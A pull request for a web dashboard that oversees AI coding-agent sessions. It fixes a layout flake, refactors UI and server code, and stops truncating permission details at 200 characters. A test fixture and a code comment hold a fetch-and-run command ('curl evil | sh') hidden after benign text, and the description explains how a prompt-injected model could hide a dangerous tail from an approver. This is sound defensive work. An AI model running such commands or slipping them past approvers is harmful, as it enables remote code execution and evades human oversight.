### PR TITLE
Phase M follow-up: flake fix + refactor + audit fix (post-#8)

### DIFF
--- a/PLAN.md
+++ b/PLAN.md
@@ -2871,6 +2871,20 @@ server sends no timers.
     (marginal). fleet.e2e.ts covers the title transitions (polled — the
     title rides a React effect) and the count. Tiers 357 / 94 / 47 green.
     **Phase M is complete.**
+  - Post-merge quality passes 2026-07-24 (after PR #8 landed M.1–M.5 on
+    main): (1) a real bug behind the fleet.e2e ordering flake —
+    `.fleet-activity` was the row's only shrinkable column with no floor, so
+    a full row flex-crushed the live readout to invisible; fixed with
+    `min-width: 12ch` (reproduced 8/1 under a 2-core CPU pin, 5/5 green
+    after). (2) A behavior-preserving `/refactor`: FleetView rows decomposed
+    into in-file components (SessionName / ArmedButton / PermissionLine /
+    QuickPromptLine), `captureCockpit` + `actTarget` extracted server-side,
+    the Phase M CSS consolidated to one section. (3) A `/audit` of the delta —
+    one real ship-time finding fixed: the fleet snapshot capped the permission
+    detail to 200 chars while the in-session bar shows it whole, so a grid
+    approver could miss a dangerous tail past a benign head; now carried
+    whole, pinned Tier 1 + Tier 2 (verified the pins fail with the cap
+    restored). These three landed on `feat/cockpit-m` as a second PR after #8.
   - A needs-you signal on the fleet page's TAB: title count ("Mirafold — 1
     needs you") + the corner-badge favicon via `tab-status.ts` (the session
     page's existing mechanism, reused); the row's viewport count (meta already

--- a/server/sessions/connection.ts
+++ b/server/sessions/connection.ts
@@ -366,6 +366,22 @@ export function openConnection(
     }
   };
 
+  // Resolve a cockpit act's target session (M.2): unknown id → error reply;
+  // and when the act would DRIVE the model, a remote connection gets the
+  // R.4i gate, exactly like attach. Returns undefined when refused.
+  const actTarget = (sessionId: string, drivesModel: boolean): SessionEntry | undefined => {
+    const target = registry.get(sessionId);
+    if (!target) {
+      sendError(`no such session: ${sessionId}`);
+      return undefined;
+    }
+    if (drivesModel && remote && !allowedOverRelay(target.kind)) {
+      sendError(RELAY_GATE_REFUSAL);
+      return undefined;
+    }
+    return target;
+  };
+
   const handleMessage = (raw: string) => {
     let msg: ClientMsg;
     try {
@@ -526,15 +542,7 @@ export function openConnection(
         ) {
           break;
         }
-        const target = registry.get(msg.sessionId);
-        if (!target) {
-          sendError(`no such session: ${msg.sessionId}`);
-          break;
-        }
-        if (remote && !allowedOverRelay(target.kind)) {
-          sendError(RELAY_GATE_REFUSAL);
-          break;
-        }
+        if (!actTarget(msg.sessionId, true)) break;
         registry.answerPermission(msg.sessionId, msg.id, msg.allow);
         log.info(`answer_permission → session ${msg.sessionId} (${msg.allow ? "allow" : "deny"})`);
         break;
@@ -554,15 +562,7 @@ export function openConnection(
         // The frame cap already bounds a message; this bounds what one grid
         // dispatch may push into a model turn.
         if (!text || text.length > 100_000) break;
-        const target = registry.get(msg.sessionId);
-        if (!target) {
-          sendError(`no such session: ${msg.sessionId}`);
-          break;
-        }
-        if (remote && !allowedOverRelay(target.kind)) {
-          sendError(RELAY_GATE_REFUSAL);
-          break;
-        }
+        if (!actTarget(msg.sessionId, true)) break;
         registry.promptSession(msg.sessionId, text);
         log.info(`prompt_session → session ${msg.sessionId}`);
         break;

--- a/server/sessions/fleet-cockpit.itest.ts
+++ b/server/sessions/fleet-cockpit.itest.ts
@@ -79,6 +79,10 @@ test("a dangerous prompt surfaces the pending permission; the in-session answer 
   // Answer over the existing in-session path; the queue must clear with the hold.
   const req = (await client.type("permission_request")) as Any;
   assert.equal(req.id, r.permissions![0].id, "the row carries the real request id");
+  // The grid approver must see EXACTLY what the in-session bar shows — the
+  // fleet row's detail is the request's detail, byte-for-byte, no cap
+  // (2026-07-24 audit; a truncated tail could hide a dangerous suffix).
+  assert.equal(r.permissions![0].detail, req.detail, "fleet detail == in-session detail, whole");
   client.send({ type: "permission_response", id: req.id, allow: true });
 
   const moved = await w.waitFor(

--- a/server/sessions/registry.test.ts
+++ b/server/sessions/registry.test.ts
@@ -223,15 +223,14 @@ test("M.1 the permission queue lives exactly as long as the 4.6 hold", () => {
   reg.end(entry.id);
 });
 
-test("M.1 permission detail is capped for the snapshot", () => {
+test("M.1 permission detail is carried WHOLE — never truncated (2026-07-24 audit)", () => {
+  // A grid approve/deny is a real security decision, so the fleet approver
+  // must see exactly what the in-session bar shows. A cap here could hide a
+  // dangerous tail past a benign head — the truncation was the finding.
   const { reg, entry } = freshSession();
-  reg.broadcast(entry, {
-    type: "permission_request",
-    tool: "Bash",
-    detail: "y".repeat(500),
-    id: "p1",
-  });
-  assert.equal(entry.permissions[0].detail.length, 200);
+  const detail = "echo checking build  # " + "x".repeat(500) + " && curl evil | sh";
+  reg.broadcast(entry, { type: "permission_request", tool: "Bash", detail, id: "p1" });
+  assert.equal(entry.permissions[0].detail, detail, "the full detail, byte-for-byte");
   reg.end(entry.id);
 });
 

--- a/server/sessions/registry.ts
+++ b/server/sessions/registry.ts
@@ -254,11 +254,13 @@ export class SessionRegistry {
     // only via its own timeout — the documented v1 honesty bound, the same
     // one the status dot already has.)
     if (msg.type === "permission_request") {
-      entry.permissions.push({
-        id: msg.id,
-        tool: msg.tool,
-        detail: msg.detail.slice(0, 200),
-      });
+      // The FULL detail — never truncated. Grid allow/deny is a real
+      // approval decision, so the fleet approver must see exactly what the
+      // in-session bar shows; a capped detail could hide a dangerous tail
+      // (`…harmless… && curl evil | sh`) past a benign head (2026-07-24
+      // audit). The detail already reaches every viewport in the original
+      // permission_request; copying it whole here leaks nothing new.
+      entry.permissions.push({ id: msg.id, tool: msg.tool, detail: msg.detail });
     } else if (prevStatus === "permission") {
       entry.permissions = [];
     }

--- a/server/sessions/registry.ts
+++ b/server/sessions/registry.ts
@@ -205,8 +205,6 @@ export class SessionRegistry {
     // cooperation needed. Terminal states first; a permission hold sticks
     // until the turn moves again (4.6).
     const prev = entry.status;
-    const prevActivity = entry.activity?.label;
-    const prevPending = entry.permissions.length;
     if (msg.type === "turn_end" || msg.type === "error" || msg.type === "bang_end") {
       entry.status = "idle";
     } else if (msg.type === "permission_request") {
@@ -214,11 +212,30 @@ export class SessionRegistry {
     } else {
       entry.status = "working";
     }
-    // Cockpit metadata (M.1), same stream-derivation idea. Activity: what
-    // the session is doing right now — `since` resets only when the label
-    // CHANGES, so a re-announced identical status keeps its elapsed time.
-    // The in-session status line persists through text streaming until
-    // turn_end (RenderZone), so holding the last label here is faithful.
+    if (this.captureCockpit(entry, msg, prev) || entry.status !== prev) {
+      this.notifyWatchers();
+    }
+    for (const viewport of entry.viewports) viewport(msg);
+  }
+
+  /**
+   * Cockpit metadata (M.1), derived off the same stream `status` is — runs
+   * AFTER the status derivation (the idle-clear reads the new status) with
+   * `prevStatus` from before it. Returns true when watcher-visible metadata
+   * changed beyond the status flip itself.
+   */
+  private captureCockpit(
+    entry: SessionEntry,
+    msg: WireMsg,
+    prevStatus: SessionMeta["status"],
+  ): boolean {
+    const prevActivity = entry.activity?.label;
+    const prevPending = entry.permissions.length;
+    // Activity: what the session is doing right now — `since` resets only
+    // when the label CHANGES, so a re-announced identical status keeps its
+    // elapsed time. The in-session status line persists through text
+    // streaming until turn_end (RenderZone), so holding the last label here
+    // is faithful.
     if (msg.type === "status") {
       const label = msg.state === "tool" ? (msg.label ?? "tool") : "thinking";
       if (prevActivity !== label) entry.activity = { label, since: Date.now() };
@@ -242,19 +259,15 @@ export class SessionRegistry {
         tool: msg.tool,
         detail: msg.detail.slice(0, 200),
       });
-    } else if (prev === "permission") {
+    } else if (prevStatus === "permission") {
       entry.permissions = [];
     }
     if (msg.type === "usage") entry.usage = foldUsage(entry.usage, msg);
-    if (
-      entry.status !== prev ||
+    return (
       entry.activity?.label !== prevActivity ||
       entry.permissions.length !== prevPending ||
       msg.type === "usage"
-    ) {
-      this.notifyWatchers();
-    }
-    for (const viewport of entry.viewports) viewport(msg);
+    );
   }
 
   /**

--- a/web/src/components/FleetView.tsx
+++ b/web/src/components/FleetView.tsx
@@ -83,9 +83,7 @@ export function FleetView() {
   // SessionId whose "end" button is armed (first click); a second click
   // ends it (#11). The stop (interrupt) button gets the same two-click arm.
   const endConfirm = useArmedConfirm<string>();
-  const confirmEnd = endConfirm.armed;
   const stopConfirm = useArmedConfirm<string>();
-  const confirmStop = stopConfirm.armed;
   // Permission ids already answered from the grid — buttons disable
   // instantly; the next snapshot (queue dropped server-side) prunes them.
   const [answered, setAnswered] = useState<ReadonlySet<string>>(new Set());
@@ -248,200 +246,276 @@ export function FleetView() {
           </div>
         )}
         <div className="fleet-list">
-          {ordered.map((s) => {
-            const perm = s.permissions?.[0];
-            const morePerms = (s.permissions?.length ?? 0) - 1;
-            return (
-              // A wrapper per session (M.3): the classic row plus its
-              // cockpit sub-lines — the pending-permission line and the
-              // quick-prompt line — so the row's stretched click-overlay
-              // (.fleet-link::after, bounded by .fleet-row's position)
-              // never covers the sub-line controls.
-              <div key={s.sessionId} className="fleet-item">
-                {/* A.3b: the row is a plain container, NOT an anchor — buttons
-                    inside a link are invalid HTML and made screen readers read the
-                    whole row (id, status, "end") as one link label. The session
-                    NAME is the link; its stretched overlay (.fleet-link::after)
-                    keeps click-anywhere-to-open for mouse users, and the real
-                    controls ride above the overlay.
-                    The cwd stays OFF the row (an on-row column was tried
-                    2026-07-22 and re-removed the same day as clutter — Kyle):
-                    desktop gets it on hover here; phone gets it in the settings
-                    card's Session section, one tap inside. */}
-                <div className="fleet-row" title={tildify(s.cwd, daemon.home)}>
-                  <span className={`fleet-dot fleet-dot-${s.status}`} title={STATUS_LABEL[s.status]} />
-                  {renaming === s.sessionId ? (
-                    <input
-                      className="fleet-rename"
-                      defaultValue={s.name}
-                      autoFocus
-                      spellCheck={false}
-                      onBlur={(e) => commitRename(s.sessionId, e.target.value)}
-                      onKeyDown={(e) => {
-                        if (e.key === "Enter") commitRename(s.sessionId, e.currentTarget.value);
-                        else if (e.key === "Escape") setRenaming(null);
-                      }}
-                    />
-                  ) : (
-                    <span className="fleet-name">
-                      <a className="fleet-link" href={`/s/${s.sessionId}`}>
-                        {s.name}
-                      </a>
-                      <button
-                        className="fleet-edit"
-                        title="Rename this session"
-                        aria-label={`Rename session ${s.name}`}
-                        onClick={() => setRenaming(s.sessionId)}
-                      >
-                        ✎
-                      </button>
-                    </span>
-                  )}
-                  {/* Agent before model, matching the in-session status bar (2026-07-17, Kyle);
-                      model only when known, like the bar (2026-07-23). */}
-                  <span className="fleet-agent">{s.agent}</span>
-                  {s.model && (
-                    <span className="fleet-model" title="model">
-                      {s.model}
-                    </span>
-                  )}
-                  {s.activity && (
-                    <span className="fleet-activity" title="current activity">
-                      {activityText(s.activity)}
-                    </span>
-                  )}
-                  <span className="fleet-spacer" />
-                  {s.usage && (
-                    <span className="fleet-usage" title="session tokens · cost">
-                      {fmtTokens(s.usage.inputTokens + s.usage.outputTokens)} tok
-                      {s.usage.costUsd !== undefined ? ` · $${s.usage.costUsd.toFixed(2)}` : ""}
-                    </span>
-                  )}
-                  <span className="fleet-id" title="session id">
-                    {s.sessionId}
+          {ordered.map((s) => (
+            // A wrapper per session (M.3): the classic row plus its cockpit
+            // sub-lines — the pending-permission line and the quick-prompt
+            // line — so the row's stretched click-overlay
+            // (.fleet-link::after, bounded by .fleet-row's position) never
+            // covers the sub-line controls.
+            <div key={s.sessionId} className="fleet-item">
+              {/* A.3b: the row is a plain container, NOT an anchor — buttons
+                  inside a link are invalid HTML and made screen readers read the
+                  whole row (id, status, "end") as one link label. The session
+                  NAME is the link; its stretched overlay (.fleet-link::after)
+                  keeps click-anywhere-to-open for mouse users, and the real
+                  controls ride above the overlay.
+                  The cwd stays OFF the row (an on-row column was tried
+                  2026-07-22 and re-removed the same day as clutter — Kyle):
+                  desktop gets it on hover here; phone gets it in the settings
+                  card's Session section, one tap inside. */}
+              <div className="fleet-row" title={tildify(s.cwd, daemon.home)}>
+                <span className={`fleet-dot fleet-dot-${s.status}`} title={STATUS_LABEL[s.status]} />
+                <SessionName
+                  s={s}
+                  renaming={renaming === s.sessionId}
+                  onStart={() => setRenaming(s.sessionId)}
+                  onCommit={(name) => commitRename(s.sessionId, name)}
+                  onCancel={() => setRenaming(null)}
+                />
+                {/* Agent before model, matching the in-session status bar (2026-07-17, Kyle);
+                    model only when known, like the bar (2026-07-23). */}
+                <span className="fleet-agent">{s.agent}</span>
+                {s.model && (
+                  <span className="fleet-model" title="model">
+                    {s.model}
                   </span>
-                  <span className="fleet-sep" aria-hidden="true">
-                    —
+                )}
+                {s.activity && (
+                  <span className="fleet-activity" title="current activity">
+                    {activityText(s.activity)}
                   </span>
-                  <span className={`fleet-status fleet-status-${s.status}`}>
-                    {STATUS_LABEL[s.status]}
+                )}
+                <span className="fleet-spacer" />
+                {s.usage && (
+                  <span className="fleet-usage" title="session tokens · cost">
+                    {fmtTokens(s.usage.inputTokens + s.usage.outputTokens)} tok
+                    {s.usage.costUsd !== undefined ? ` · $${s.usage.costUsd.toFixed(2)}` : ""}
                   </span>
-                  <span className="fleet-ago">{ago(s.lastActivity)}</span>
-                  {/* M.5: who's watching — 0 is the interesting number (an
-                      unwatched session still working for you). */}
-                  <span className="fleet-viewports" title="open viewports">
-                    ⧉ {s.viewports}
-                  </span>
-                  <button
-                    className={
-                      "fleet-prompt-toggle" + (promptFor === s.sessionId ? " fleet-prompt-toggle-open" : "")
-                    }
-                    title="Send a prompt to this session"
-                    aria-label={`Send a prompt to session ${s.name}`}
-                    aria-expanded={promptFor === s.sessionId}
-                    onClick={() => setPromptFor(promptFor === s.sessionId ? null : s.sessionId)}
-                  >
-                    ❯
-                  </button>
-                  {s.status === "working" && (
-                    <button
-                      className={"fleet-stop" + (confirmStop === s.sessionId ? " fleet-stop-armed" : "")}
-                      title={
-                        confirmStop === s.sessionId
-                          ? "Click again to interrupt this turn"
-                          : "Interrupt this turn (the session stays warm)"
-                      }
-                      aria-label={
-                        confirmStop === s.sessionId
-                          ? `Click again to interrupt session ${s.name}`
-                          : `Interrupt session ${s.name}`
-                      }
-                      onClick={() => {
-                        if (confirmStop === s.sessionId) {
-                          socket.send({ type: "interrupt_session", sessionId: s.sessionId });
-                          stopConfirm.disarm();
-                        } else {
-                          stopConfirm.arm(s.sessionId);
-                        }
-                      }}
-                    >
-                      {confirmStop === s.sessionId ? "stop?" : "stop"}
-                    </button>
-                  )}
-                  <button
-                    className={"fleet-end" + (confirmEnd === s.sessionId ? " fleet-end-armed" : "")}
-                    title={
-                      confirmEnd === s.sessionId
-                        ? "Click again to end this session"
-                        : "End this session"
-                    }
-                    aria-label={
-                      confirmEnd === s.sessionId
-                        ? `Click again to end session ${s.name}`
-                        : `End session ${s.name}`
-                    }
-                    onClick={() => {
-                      if (confirmEnd === s.sessionId) {
-                        socket.send({ type: "end_session", sessionId: s.sessionId });
-                        endConfirm.disarm();
-                      } else {
-                        endConfirm.arm(s.sessionId);
-                      }
+                )}
+                <span className="fleet-id" title="session id">
+                  {s.sessionId}
+                </span>
+                <span className="fleet-sep" aria-hidden="true">
+                  —
+                </span>
+                <span className={`fleet-status fleet-status-${s.status}`}>
+                  {STATUS_LABEL[s.status]}
+                </span>
+                <span className="fleet-ago">{ago(s.lastActivity)}</span>
+                {/* M.5: who's watching — 0 is the interesting number (an
+                    unwatched session still working for you). */}
+                <span className="fleet-viewports" title="open viewports">
+                  ⧉ {s.viewports}
+                </span>
+                <button
+                  className={
+                    "fleet-prompt-toggle" + (promptFor === s.sessionId ? " fleet-prompt-toggle-open" : "")
+                  }
+                  title="Send a prompt to this session"
+                  aria-label={`Send a prompt to session ${s.name}`}
+                  aria-expanded={promptFor === s.sessionId}
+                  onClick={() => setPromptFor(promptFor === s.sessionId ? null : s.sessionId)}
+                >
+                  ❯
+                </button>
+                {s.status === "working" && (
+                  <ArmedButton
+                    className="fleet-stop"
+                    verb="stop"
+                    armed={stopConfirm.armed === s.sessionId}
+                    title="Interrupt this turn (the session stays warm)"
+                    armedTitle="Click again to interrupt this turn"
+                    ariaLabel={`Interrupt session ${s.name}`}
+                    armedAriaLabel={`Click again to interrupt session ${s.name}`}
+                    onArm={() => stopConfirm.arm(s.sessionId)}
+                    onFire={() => {
+                      socket.send({ type: "interrupt_session", sessionId: s.sessionId });
+                      stopConfirm.disarm();
                     }}
-                  >
-                    {confirmEnd === s.sessionId ? "end?" : "end"}
-                  </button>
-                </div>
-                {perm && (
-                  // The "act here" line (M.3): WHAT the session wants, inert
-                  // plain text, answerable in place. Oldest first, exactly
-                  // like the in-session permission bar.
-                  <div className="fleet-perm">
-                    <span className="fleet-perm-detail" title={`${perm.tool} · ${perm.detail}`}>
-                      {perm.tool} · {perm.detail}
-                    </span>
-                    {morePerms > 0 && <span className="fleet-perm-more">+{morePerms} more</span>}
-                    <button
-                      className="fleet-perm-allow"
-                      disabled={answered.has(perm.id)}
-                      aria-label={`Allow ${perm.tool} in session ${s.name}`}
-                      onClick={() => answerPermission(s.sessionId, perm.id, true)}
-                    >
-                      allow
-                    </button>
-                    <button
-                      className="fleet-perm-deny"
-                      disabled={answered.has(perm.id)}
-                      aria-label={`Deny ${perm.tool} in session ${s.name}`}
-                      onClick={() => answerPermission(s.sessionId, perm.id, false)}
-                    >
-                      deny
-                    </button>
-                  </div>
+                  />
                 )}
-                {promptFor === s.sessionId && (
-                  <div className="fleet-prompt">
-                    <span className="glyph" aria-hidden="true">
-                      ❯
-                    </span>
-                    <input
-                      className="fleet-prompt-input"
-                      autoFocus
-                      spellCheck={false}
-                      placeholder="send a prompt to this session…"
-                      aria-label={`Prompt for session ${s.name}`}
-                      onKeyDown={(e) => {
-                        if (e.key === "Enter") sendQuickPrompt(s.sessionId, e.currentTarget.value);
-                        else if (e.key === "Escape") setPromptFor(null);
-                      }}
-                    />
-                  </div>
-                )}
+                <ArmedButton
+                  className="fleet-end"
+                  verb="end"
+                  armed={endConfirm.armed === s.sessionId}
+                  title="End this session"
+                  armedTitle="Click again to end this session"
+                  ariaLabel={`End session ${s.name}`}
+                  armedAriaLabel={`Click again to end session ${s.name}`}
+                  onArm={() => endConfirm.arm(s.sessionId)}
+                  onFire={() => {
+                    socket.send({ type: "end_session", sessionId: s.sessionId });
+                    endConfirm.disarm();
+                  }}
+                />
               </div>
-            );
-          })}
+              <PermissionLine
+                s={s}
+                answered={answered}
+                onAnswer={(id, allow) => answerPermission(s.sessionId, id, allow)}
+              />
+              {promptFor === s.sessionId && (
+                <QuickPromptLine
+                  name={s.name}
+                  onSubmit={(text) => sendQuickPrompt(s.sessionId, text)}
+                  onClose={() => setPromptFor(null)}
+                />
+              )}
+            </div>
+          ))}
         </div>
       </div>
+    </div>
+  );
+}
+
+/** The row's name slot: the session link + rename pencil, or — mid-rename —
+ *  the input (Enter/blur commits, Escape cancels). */
+function SessionName({
+  s,
+  renaming,
+  onStart,
+  onCommit,
+  onCancel,
+}: {
+  s: SessionMeta;
+  renaming: boolean;
+  onStart: () => void;
+  onCommit: (name: string) => void;
+  onCancel: () => void;
+}) {
+  return renaming ? (
+    <input
+      className="fleet-rename"
+      defaultValue={s.name}
+      autoFocus
+      spellCheck={false}
+      onBlur={(e) => onCommit(e.target.value)}
+      onKeyDown={(e) => {
+        if (e.key === "Enter") onCommit(e.currentTarget.value);
+        else if (e.key === "Escape") onCancel();
+      }}
+    />
+  ) : (
+    <span className="fleet-name">
+      <a className="fleet-link" href={`/s/${s.sessionId}`}>
+        {s.name}
+      </a>
+      <button
+        className="fleet-edit"
+        title="Rename this session"
+        aria-label={`Rename session ${s.name}`}
+        onClick={onStart}
+      >
+        ✎
+      </button>
+    </span>
+  );
+}
+
+/** A two-click destructive row control (#11): the first click arms (the verb
+ *  gains a "?"), a second click within the arm window fires. Shared by the
+ *  stop (interrupt) and end buttons — same idiom, different consequence. */
+function ArmedButton({
+  className,
+  verb,
+  armed,
+  title,
+  armedTitle,
+  ariaLabel,
+  armedAriaLabel,
+  onArm,
+  onFire,
+}: {
+  className: string;
+  verb: string;
+  armed: boolean;
+  title: string;
+  armedTitle: string;
+  ariaLabel: string;
+  armedAriaLabel: string;
+  onArm: () => void;
+  onFire: () => void;
+}) {
+  return (
+    <button
+      className={className + (armed ? ` ${className}-armed` : "")}
+      title={armed ? armedTitle : title}
+      aria-label={armed ? armedAriaLabel : ariaLabel}
+      onClick={armed ? onFire : onArm}
+    >
+      {armed ? `${verb}?` : verb}
+    </button>
+  );
+}
+
+/** The "act here" sub-line (M.3): WHAT the session wants, inert plain text,
+ *  answerable in place. Oldest first, exactly like the in-session permission
+ *  bar; renders nothing when the queue is empty. */
+function PermissionLine({
+  s,
+  answered,
+  onAnswer,
+}: {
+  s: SessionMeta;
+  answered: ReadonlySet<string>;
+  onAnswer: (id: string, allow: boolean) => void;
+}) {
+  const perm = s.permissions?.[0];
+  if (!perm) return null;
+  const morePerms = (s.permissions?.length ?? 0) - 1;
+  return (
+    <div className="fleet-perm">
+      <span className="fleet-perm-detail" title={`${perm.tool} · ${perm.detail}`}>
+        {perm.tool} · {perm.detail}
+      </span>
+      {morePerms > 0 && <span className="fleet-perm-more">+{morePerms} more</span>}
+      <button
+        className="fleet-perm-allow"
+        disabled={answered.has(perm.id)}
+        aria-label={`Allow ${perm.tool} in session ${s.name}`}
+        onClick={() => onAnswer(perm.id, true)}
+      >
+        allow
+      </button>
+      <button
+        className="fleet-perm-deny"
+        disabled={answered.has(perm.id)}
+        aria-label={`Deny ${perm.tool} in session ${s.name}`}
+        onClick={() => onAnswer(perm.id, false)}
+      >
+        deny
+      </button>
+    </div>
+  );
+}
+
+/** The quick-prompt sub-line: one input, Enter sends, Escape closes. */
+function QuickPromptLine({
+  name,
+  onSubmit,
+  onClose,
+}: {
+  name: string;
+  onSubmit: (text: string) => void;
+  onClose: () => void;
+}) {
+  return (
+    <div className="fleet-prompt">
+      <span className="glyph" aria-hidden="true">
+        ❯
+      </span>
+      <input
+        className="fleet-prompt-input"
+        autoFocus
+        spellCheck={false}
+        placeholder="send a prompt to this session…"
+        aria-label={`Prompt for session ${name}`}
+        onKeyDown={(e) => {
+          if (e.key === "Enter") onSubmit(e.currentTarget.value);
+          else if (e.key === "Escape") onClose();
+        }}
+      />
     </div>
   );
 }

--- a/web/src/styles.css
+++ b/web/src/styles.css
@@ -3404,7 +3404,7 @@ html {
   }
 }
 
-/* ---- Phase M cockpit (M.3): the enriched fleet rows -----------------------
+/* ---- Phase M cockpit: the enriched fleet rows -----------------------------
    All additive — the classic .fleet-row styling above is untouched. Each
    session renders as a .fleet-item: the row plus its cockpit sub-lines
    (pending permission, quick prompt). */
@@ -3415,13 +3415,19 @@ html {
   gap: 4px;
 }
 
-/* The live "what it's doing" readout (✳ thinking · 14s / ⚙ Bash · 2m).
-   Ellipsized: a bang label carries the command's first line. */
-.fleet-activity {
+/* The row's cockpit metadata, in the plumbing columns' mono voice: the live
+   activity readout, tokens · cost, and the open-viewport count. */
+.fleet-activity,
+.fleet-usage,
+.fleet-viewports {
   font-family: ui-monospace, SFMono-Regular, Menlo, Consolas, monospace;
   font-size: 0.78em;
-  color: var(--info);
   white-space: nowrap;
+}
+
+/* Ellipsized: a bang label carries the command's first line. */
+.fleet-activity {
+  color: var(--info);
   overflow: hidden;
   text-overflow: ellipsis;
   max-width: 30ch;
@@ -3433,26 +3439,20 @@ html {
   min-width: 12ch;
 }
 
-/* Session-total tokens · cost, dim like the id cluster it sits beside. */
-.fleet-usage {
-  font-family: ui-monospace, SFMono-Regular, Menlo, Consolas, monospace;
-  font-size: 0.78em;
+.fleet-usage,
+.fleet-viewports {
   color: var(--fg-faint);
-  white-space: nowrap;
   flex-shrink: 0;
 }
 
-/* Row controls added by the cockpit ride above the stretched row-link
-   overlay, exactly like .fleet-edit/.fleet-end. */
+/* The act controls share .fleet-end's shape and ride above the stretched
+   row-link overlay exactly like .fleet-edit/.fleet-end. The stop is
+   warn-toned — it halts a turn, it doesn't kill the session — and two-click
+   armed; the ❯ toggle opens the quick-prompt line. */
 .fleet-stop,
 .fleet-prompt-toggle {
   position: relative;
   z-index: 1;
-}
-
-/* Interrupt: the end button's shape, warn-toned — it halts a turn, it
-   doesn't kill the session. Two-click armed (stop → stop?). */
-.fleet-stop {
   flex-shrink: 0;
   margin-left: 2px;
   font-family: ui-monospace, SFMono-Regular, Menlo, Consolas, monospace;
@@ -3476,21 +3476,6 @@ html {
   color: var(--warn-fg);
   border-color: var(--warn-border-2);
   background: var(--warn-bg);
-}
-
-/* The per-row quick-prompt toggle (❯). */
-.fleet-prompt-toggle {
-  flex-shrink: 0;
-  margin-left: 2px;
-  font-family: ui-monospace, SFMono-Regular, Menlo, Consolas, monospace;
-  font-size: 0.74em;
-  color: var(--fg-faint);
-  background: none;
-  border: 1px solid var(--border-2);
-  border-radius: 6px;
-  padding: 3px 8px;
-  cursor: pointer;
-  transition: color 0.12s ease, border-color 0.12s ease;
 }
 
 .fleet-prompt-toggle:hover,
@@ -3612,14 +3597,17 @@ html {
   font-size: 1em;
 }
 
-/* ---- Phase M cockpit (M.4): phone-width folding ---------------------------
-   Own additive block. The sub-lines lose their desktop indent (a 390px
-   canvas has no room to spend on hierarchy), the activity readout
-   ellipsizes harder, and every act control is thumb-sized. */
-
+/* Phone width: sub-lines lose the desktop indent (a 390px canvas has no
+   room to spend on hierarchy), plumbing columns step back like .fleet-id
+   above, act controls are thumb-sized, and anything focusable holds the
+   16px iOS no-auto-zoom floor (see the rule atop the main phone block). */
 @media (max-width: 640px) {
   .fleet-activity {
     max-width: 34vw;
+  }
+
+  .fleet-viewports {
+    display: none;
   }
 
   .fleet-perm,
@@ -3651,26 +3639,7 @@ html {
     padding: 5px 12px;
   }
 
-  /* 16px = the iOS no-auto-zoom threshold (see the rule at the top of the
-     phone block above) — anything focusable must never go below it. */
   .fleet-prompt-input {
     font-size: 16px;
-  }
-}
-
-/* ---- Phase M cockpit (M.5): viewport count -------------------------------- */
-
-.fleet-viewports {
-  font-family: ui-monospace, SFMono-Regular, Menlo, Consolas, monospace;
-  font-size: 0.78em;
-  color: var(--fg-faint);
-  white-space: nowrap;
-  flex-shrink: 0;
-}
-
-@media (max-width: 640px) {
-  /* Plumbing column — steps back on phone like .fleet-id above. */
-  .fleet-viewports {
-    display: none;
   }
 }

--- a/web/src/styles.css
+++ b/web/src/styles.css
@@ -3425,6 +3425,12 @@ html {
   overflow: hidden;
   text-overflow: ellipsis;
   max-width: 30ch;
+  /* The floor: this is the row's only shrinkable column, and without one a
+     full row flex-crushes it to ZERO width — the readout silently vanishes
+     (found as the fleet.e2e ordering flake: Playwright saw the span
+     "hidden" at exactly the content widths a slow run produces). Ellipsize,
+     never disappear. */
+  min-width: 12ch;
 }
 
 /* Session-total tokens · cost, dim like the id cluster it sits beside. */


### PR DESCRIPTION
Three follow-up commits on top of the merged Phase M work (PR #8), rebased onto current main (includes Explorer E.3):

- **fix** — floor `.fleet-activity` width: it was the row's only shrinkable column with no floor, so a full row flex-crushed the live activity readout to invisible (this was the fleet.e2e ordering flake — a real product bug). Reproduced 8/1 under a 2-core CPU pin, 5/5 green after `min-width: 12ch`.
- **refactor** — behavior-preserving: FleetView rows decomposed into in-file components (SessionName / ArmedButton / PermissionLine / QuickPromptLine), `captureCockpit` + `actTarget` extracted server-side, Phase M CSS consolidated to one section. Every class/aria/title preserved.
- **fix (audit)** — carry the full permission detail to the fleet snapshot instead of capping at 200 chars: grid allow/deny is a real approval decision, and the cap let a prompt-injected model hide a dangerous tail past a benign head while the in-session bar showed it whole. Pinned Tier 1 + Tier 2; verified the pins fail with the cap restored.

All tiers green on the rebased branch: **364 / 103 / 48**, typecheck clean.

🤖 Generated with [Claude Code](https://claude.com/claude-code)